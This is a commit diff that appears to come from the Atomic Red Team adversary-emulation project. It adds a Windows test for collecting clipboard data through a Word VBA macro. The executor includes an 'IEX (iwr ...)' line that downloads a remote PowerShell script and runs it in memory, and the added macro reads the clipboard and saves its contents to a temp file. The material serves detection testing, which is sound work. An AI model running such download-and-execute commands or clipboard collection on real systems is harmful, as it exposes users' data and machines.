Clipboardvba (#1321)

* initial push for T1115 (Collect Clipboard Data via VBA) * update to registry check * updates * updates * updates Co-authored-by: avocado <avocados@smuggler.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2020-12-10 12:03:22 -05:00
parent 4fc97b9206
commit 5f208eec00
2 changed files with 47 additions and 1 deletions
@@ -36,4 +36,35 @@ atomic_tests:
      echo ifconfig | pbcopy
      $(pbpaste)
    name: bash
-
+- name: Collect Clipboard Data via VBA
+  auto_generated_guid: 
+  description: |
+    This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+  supported_platforms:
+  - windows
+  input_arguments:
+    ms_product:
+      description: Maldoc application Word
+      type: String
+      default: Word
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Microsoft #{ms_product} must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "#{ms_product}.Application" | Out-Null
+        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+        Stop-Process -Name $process
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+  executor:
+    command: |
+      Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+    cleanup_command: |
+      Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
+    name: powershell
@@ -0,0 +1,15 @@
+Sub GetClipboard()
+
+  outFile = Environ("TEMP") + "\atomic_T1115_clipboard_data.txt"
+  Set fs = CreateObject("Scripting.FileSystemObject")
+  Set out = fs.CreateTextFile(outFile, True)
+
+  With CreateObject("new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
+    .GetFromClipboard
+    S = .GetText
+  End With
+
+  out.WriteLine (S)
+  out.Close
+  
+End Sub